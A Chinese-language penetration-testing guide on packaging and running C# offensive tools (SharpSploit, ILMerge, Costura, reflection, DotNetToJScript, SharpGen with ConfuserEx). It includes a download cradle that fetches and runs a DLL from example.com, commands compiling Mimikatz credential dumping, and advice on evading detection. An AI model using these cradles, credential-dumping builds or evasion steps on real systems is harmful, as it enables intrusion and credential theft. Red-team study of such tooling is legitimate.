C#在渗透实战中的挑战与解决方案

1. 引言

随着攻击工具继续朝着将C#作为漏洞利用语言的方向发展，在实战中使用C#攻击脚本变得非常有用。与PowerShell相比，C#提供了更好的隐蔽性，但同时也带来了一些操作上的挑战。本文档将详细记录这些实战挑战，并提供相应的解决方案。

2. C#执行挑战与解决方案

2.1 执行方式选择

发布C#工具时有两种主要形式：

• 独立可执行文件(.exe)
• 库文件(.dll)

选择库文件形式虽然增加了灵活性，但也带来了如何在实战中使用DLL的挑战。

2.2 解决方案比较

2.2.1 ILMerge

原理：开源的.NET程序静态链接器，将多个.NET程序合并为一个输出程序。

使用方法：

1. 创建引用SharpSploit的控制台应用程序
2. 编写使用SharpSploit的定制代码
3. 构建应用程序生成.exe和.dll文件
4. 使用ILMerge合并程序

示例命令：

ILMerge.exe /out:SharpSploit.exe SharpSploitDriver.exe SharpSploit.dll

特点：

• 生成自包含的可执行文件
• 合并程序具有部分破坏性
• 可能影响应用程序执行

2.2.2 Costura

原理：将DLL引用作为"嵌入式资源"添加到控制台应用程序。

使用方法：

1. 创建控制台应用程序并添加SharpSploit引用
2. 添加Costura.Fody NuGet包
3. 编写定制代码
4. 重新编译生成独立.exe

注意事项：

• 最新版本不支持.NET Framework v3.5
• 需安装Costura v1.6.2以支持.NET Framework v3.5

特点：

• 生成独立可执行文件
• 包含Costura调用和资源信息
• 隐蔽性略低于ILMerge

2.2.3 Reflection

原理：使用System.Reflection命名空间加载.NET程序集并调用方法。

PowerShell示例：

[System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes("SharpSploit.dll")).GetType("SharpSploit.Execution.Shell").GetMethod("ShellExecute").Invoke(0, @("whoami"))

C#示例：

System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData("https://example.com/SharpSploit.dll")).GetType("SharpSploit.Execution.Shell").GetMethod("ShellExecute").Invoke(0, @("whoami"));

特点：

• 可作为"download cradle"使用
• 节省可执行文件大小
• 避免复杂性

2.2.4 DotNetToJScript

原理：创建加载指定.NET程序的JScript或VBScript文件。

限制：

• 不适用于大型程序
• 不适用于静态类或方法
• 需要将脚本文件写入磁盘

解决方法：

1. 注释掉不需要的嵌入式资源
2. 移除静态分类器

3. 实战便利性挑战

3.1 现有解决方案

1. SharpSploitConsole：利用Costura
2. SharpAttack：利用ILMerge

优点：

• 只需编译一次控制台应用程序
• 可访问大部分功能

缺点：

• 灵活性受限
• 无法执行定制C#代码
• 无法与Cobalt Strike的execute-assembly命令配合使用

4. SharpGen解决方案

4.1 基础功能

核心功能：利用Roslyn C#编译器快速交叉编译.NET框架控制台应用程序或库。

基本用法：

dotnet SharpGen.dll -f example.exe "Console.WriteLine(Mimikatz.LogonPasswords());"

从文件读取源码：

dotnet SharpGen.dll -f example.exe --source-file example.txt

4.2 目录结构

SharpGen
├── Source          # 编译时包含的源代码
├── References      # 编译时引用的DLL
├── Resources       # 编译时嵌入的资源
├── Output          # 输出目录
└── confuse.cr      # ConfuserEx项目文件

4.3 高级用法

4.3.1 资源管理

减小二进制大小的方法：

1. 禁用不需要的资源
2. 只嵌入特定平台的资源
3. 使用压缩资源
4. 使用ConfuserEx资源保护

resources.yml配置示例：

- Name: SharpSploit.Resources.powerkatz_x86.dll
  File: powerkatz_x86.dll
  Platform: x86
  Enabled: false

4.3.2 ConfuserEx混淆

使用方法：

dotnet SharpGen.dll -f example.exe --confuse confuse.cr "Console.WriteLine(Mimikatz.LogonPasswords());"

confuse.cr示例：

<project baseDir="{0}" outputDir="{1}" xmlns="http://confuser.codeplex.com">
  <module path="{2}">
    <rule pattern="true" inherit="false">
      <protection id="resources" />
    </rule>
  </module>
</project>

4.3.3 源码优化

特性：

• 自动删除未使用的类型
• 减少二进制大小
• 提高隐蔽性

禁用优化：

dotnet SharpGen.dll -f example.exe --no-optimization "Console.WriteLine(Mimikatz.LogonPasswords());"

5. 最佳实践建议

1. 隐蔽性优先：ILMerge通常比Costura更隐蔽
2. 资源管理：根据需求选择性地嵌入资源
3. 平台选择：明确目标平台(x86/x64)
4. 混淆保护：对关键工具使用ConfuserEx
5. 源码优化：默认启用以减小体积和提高隐蔽性

6. 结论

使用C#进行渗透测试虽然面临执行、便利性和灵活性等挑战，但通过SharpGen等工具可以有效地解决这些问题。关键在于平衡隐蔽性、便利性和灵活性之间的关系，根据具体场景选择最合适的解决方案。